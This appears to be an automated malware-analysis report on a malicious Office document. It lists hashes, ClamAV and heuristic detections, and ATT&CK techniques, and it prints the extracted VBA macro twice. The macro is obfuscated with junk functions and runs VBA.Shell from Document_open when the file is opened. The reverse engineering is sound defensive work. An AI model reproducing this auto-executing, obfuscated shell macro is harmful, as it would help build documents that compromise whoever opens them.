Office (OLE) malware analysis — malicious · 35611f8bf4ad7078

MALICIOUS

Office (OLE)

162.8 KB First seen: 2019-11-20

MD5: cdb83fca762a4c710fc1a3c73e6cc640 SHA-1: 886657f92d5e13b4095c4bc5b999971a18b1bd51 SHA-256: 35611f8bf4ad70785bce71eb600b7eec0aa28ca2cdaaba9abd5511db394c538e

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is a malicious OLE document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' indicates the use of the Shell() function, which is commonly used to download and execute additional malware. The 'Document_Open' macro and 'VBA p-code auto-exec with execution tokens' heuristics further support this, suggesting an automated execution upon opening the document. The ClamAV detection ID provides a specific identifier for this malware.

Heuristics 6

ClamAV: Doc.Malware.Valyria-6794284-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Valyria-6794284-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 42003 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	42003 bytes
SHA-256: `fa8945136b7e856500fdffcfdc053d8d9f8a0ebcf05017db8a0c70eb6e9c6c4a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "vUwdwkwHZAwSRz" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Function ocDVzYTQSvXh() On Error Resume Next If FXzbRC <= 13 Then ElseIf diXIu > bZOOY Then End If If WzikI <= 13 Then ElseIf FEfYFq > vLSBq Then End If If JhpJc <= 13 Then ElseIf KLKjWV > LiMrrJ Then End If If zldrbG <= 13 Then ElseIf dwlvFS > wjvjNY Then End If If LvaPVj <= 13 Then ElseIf fvLvUz > OiNrwI Then End If End Function Private Function wVJSzwTVonG() On Error Resume Next If GGMuUf = 2 Then wPuwmz = Clnih * PjEUjQ + 2346 + TSzqHl * (nYfVH * VmFqii + 90069 + kjDLsa + (BsLEi / cwvGf)) End If If GfTwD = 2 Then mrjKNE = pLVvQ * ClEffj + 46435 + wWMYU * (hiEIB * HWpplj + 88007 + LtkZqn + (RBznR / GpVWls)) End If If ApkEzF = 2 Then ADPXwn = jHvia * oUQpI + 97967 + ivzvQ * (LSdbc * WXCchf + 90520 + kpkbzz + (IjYvww / AFGUGa)) End If If PNIMa = 2 Then utzdE = Gtjjvi * LjlfT + 33149 + ssqKkz * (pXXbr * rjfCOH + 43823 + GtMzb + (AZdho / zJBDpt)) End If If rElQAi = 2 Then aKAlcp = ADcGdS * oYoNHw + 76762 + TdHCE * (ANrBjN * nUYqJ + 18167 + SMhdb + (CfzCt / FYrXda)) End If End Function Private Function VMIDtXiAj() On Error Resume Next If kWpBcW <= 13 Then ElseIf HFqAY > wKizA Then End If If uElzi <= 13 Then ElseIf JiVPt > mwnhic Then End If If CLHkj <= 13 Then ElseIf vhtVY > PbAtYB Then End If If Obozrz <= 13 Then ElseIf LvuJd > ikjWF Then End If End Function Private Function TdlscjhE() On Error Resume Next If tpcKSn <= 13 Then ElseIf vXIjM > KcXuzb Then End If If iQqmF <= 13 Then ElseIf pAtdG > RGNfCJ Then End If If HKRpDQ <= 13 Then ElseIf ScJSjX > CcnEw Then End If If BzlmtO <= 13 Then ElseIf pWnYUf > komWw Then End If If dGWtL <= 13 Then ElseIf KSoAiA > UXjuz Then End If End Function Private Sub Document_open() On Error Resume Next If aCYIW <= 13 Then ElseIf kcHaIS > iYbWX Then End If If hNKCGZ <= 13 Then ElseIf sivPMj > QRZPC Then End If If YsZiD <= 13 Then ElseIf CMFKR > DQWlb Then End If VBA.Shell "" + PbSXrfi + qTHVNsWCzur + CVar("C") + LwmPNGCH + pfzijiiLO + BQiauS + zCkuMdz + dNZQB + BKiEwb + ufwLfjRkM + HIGZziIYbYd + tHCibYq + nkficCX + VcwPNkjuUv + HhmoJWLRs + XVGSqPJmTPjc + nDMjKjzuPCXctS, 0 If QiBZb <= 13 Then ElseIf ilpuYK > wRPwiM Then End If If GuqEsC <= 13 Then ElseIf HsoQQt > bpuIdS Then End If If GrmdFD <= 13 Then ElseIf NVqZWJ > mECkRF Then End If End Sub Private Function qkVNKvw() On Error Resume Next If PaLiK <= 13 Then ElseIf OiCTp > zAvov Then End If If FGzKCq <= 13 Then ElseIf BdAdzz > KGKlTw Then End If If jqhrkZ <= 13 Then ElseIf HtBVFj > iWIRvF Then End If If BXlZnY <= 13 Then ElseIf mvPEL > zjVoon Then End If If GBVGf <= 13 Then ElseIf mdHSwI > QoPlhS Then End If End Function Private Function rWjmDqGsBSG() On Error Resume Next If MuajHU <= 13 Then ElseIf CqdURK > Wbjokz Then End If If iqflO <= 13 Then ElseIf jrcjT > rIKLmf Then End If If ikPDT <= 13 Then ElseIf SZwil > znmin Then End If If DcjbMf <= 13 Then ElseIf AiwwBn > moitJC Then End If If ispirf <= 13 Then ElseIf tFECXO > QGzwjZ Then End If If lsuzP <= 13 Then ElseIf zYbtL > QfGKF Then End If End Function Private Function vHcBotDZ() On Error Resume Next If YtYwq <= 13 Then ElseIf nvLqR > ZNftX Then End If If LRZMAK <= 13 Then ElseIf TiqBfm > TPszh Then End If If OJsPk <= 13 Then ElseIf VFRVw > ozKnO Then End If If BFWJK <= 13 Then ElseIf jDk ... (truncated)

SHA-256: fa8945136b7e856500fdffcfdc053d8d9f8a0ebcf05017db8a0c70eb6e9c6c4a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "vUwdwkwHZAwSRz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function ocDVzYTQSvXh()
On Error Resume Next
   If FXzbRC <= 13 Then
      ElseIf diXIu > bZOOY Then
   End If
   If WzikI <= 13 Then
      ElseIf FEfYFq > vLSBq Then
   End If
   If JhpJc <= 13 Then
      ElseIf KLKjWV > LiMrrJ Then
   End If
   If zldrbG <= 13 Then
      ElseIf dwlvFS > wjvjNY Then
   End If
   If LvaPVj <= 13 Then
      ElseIf fvLvUz > OiNrwI Then
   End If
End Function
Private Function wVJSzwTVonG()
On Error Resume Next
   If GGMuUf = 2 Then
      wPuwmz = Clnih * PjEUjQ + 2346 + TSzqHl * (nYfVH * VmFqii + 90069 + kjDLsa + (BsLEi / cwvGf))
   End If
   If GfTwD = 2 Then
      mrjKNE = pLVvQ * ClEffj + 46435 + wWMYU * (hiEIB * HWpplj + 88007 + LtkZqn + (RBznR / GpVWls))
   End If
   If ApkEzF = 2 Then
      ADPXwn = jHvia * oUQpI + 97967 + ivzvQ * (LSdbc * WXCchf + 90520 + kpkbzz + (IjYvww / AFGUGa))
   End If
   If PNIMa = 2 Then
      utzdE = Gtjjvi * LjlfT + 33149 + ssqKkz * (pXXbr * rjfCOH + 43823 + GtMzb + (AZdho / zJBDpt))
   End If
   If rElQAi = 2 Then
      aKAlcp = ADcGdS * oYoNHw + 76762 + TdHCE * (ANrBjN * nUYqJ + 18167 + SMhdb + (CfzCt / FYrXda))
   End If
End Function
Private Function VMIDtXiAj()
On Error Resume Next
   If kWpBcW <= 13 Then
      ElseIf HFqAY > wKizA Then
   End If
   If uElzi <= 13 Then
      ElseIf JiVPt > mwnhic Then
   End If
   If CLHkj <= 13 Then
      ElseIf vhtVY > PbAtYB Then
   End If
   If Obozrz <= 13 Then
      ElseIf LvuJd > ikjWF Then
   End If
End Function
Private Function TdlscjhE()
On Error Resume Next
   If tpcKSn <= 13 Then
      ElseIf vXIjM > KcXuzb Then
   End If
   If iQqmF <= 13 Then
      ElseIf pAtdG > RGNfCJ Then
   End If
   If HKRpDQ <= 13 Then
      ElseIf ScJSjX > CcnEw Then
   End If
   If BzlmtO <= 13 Then
      ElseIf pWnYUf > komWw Then
   End If
   If dGWtL <= 13 Then
      ElseIf KSoAiA > UXjuz Then
   End If
End Function
Private Sub Document_open()
On Error Resume Next
   If aCYIW <= 13 Then
      ElseIf kcHaIS > iYbWX Then
   End If
   If hNKCGZ <= 13 Then
      ElseIf sivPMj > QRZPC Then
   End If
   If YsZiD <= 13 Then
      ElseIf CMFKR > DQWlb Then
   End If
VBA.Shell "" + PbSXrfi + qTHVNsWCzur + CVar("C") + LwmPNGCH + pfzijiiLO + BQiauS + zCkuMdz + dNZQB + BKiEwb + ufwLfjRkM + HIGZziIYbYd + tHCibYq + nkficCX + VcwPNkjuUv + HhmoJWLRs + XVGSqPJmTPjc + nDMjKjzuPCXctS, 0
   If QiBZb <= 13 Then
      ElseIf ilpuYK > wRPwiM Then
   End If
   If GuqEsC <= 13 Then
      ElseIf HsoQQt > bpuIdS Then
   End If
   If GrmdFD <= 13 Then
      ElseIf NVqZWJ > mECkRF Then
   End If
End Sub
Private Function qkVNKvw()
On Error Resume Next
   If PaLiK <= 13 Then
      ElseIf OiCTp > zAvov Then
   End If
   If FGzKCq <= 13 Then
      ElseIf BdAdzz > KGKlTw Then
   End If
   If jqhrkZ <= 13 Then
      ElseIf HtBVFj > iWIRvF Then
   End If
   If BXlZnY <= 13 Then
      ElseIf mvPEL > zjVoon Then
   End If
   If GBVGf <= 13 Then
      ElseIf mdHSwI > QoPlhS Then
   End If
End Function
Private Function rWjmDqGsBSG()
On Error Resume Next
   If MuajHU <= 13 Then
      ElseIf CqdURK > Wbjokz Then
   End If
   If iqflO <= 13 Then
      ElseIf jrcjT > rIKLmf Then
   End If
   If ikPDT <= 13 Then
      ElseIf SZwil > znmin Then
   End If
   If DcjbMf <= 13 Then
      ElseIf AiwwBn > moitJC Then
   End If
   If ispirf <= 13 Then
      ElseIf tFECXO > QGzwjZ Then
   End If
   If lsuzP <= 13 Then
      ElseIf zYbtL > QfGKF Then
   End If
End Function
Private Function vHcBotDZ()
On Error Resume Next
   If YtYwq <= 13 Then
      ElseIf nvLqR > ZNftX Then
   End If
   If LRZMAK <= 13 Then
      ElseIf TiqBfm > TPszh Then
   End If
   If OJsPk <= 13 Then
      ElseIf VFRVw > ozKnO Then
   End If
   If BFWJK <= 13 Then
      ElseIf jDk
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.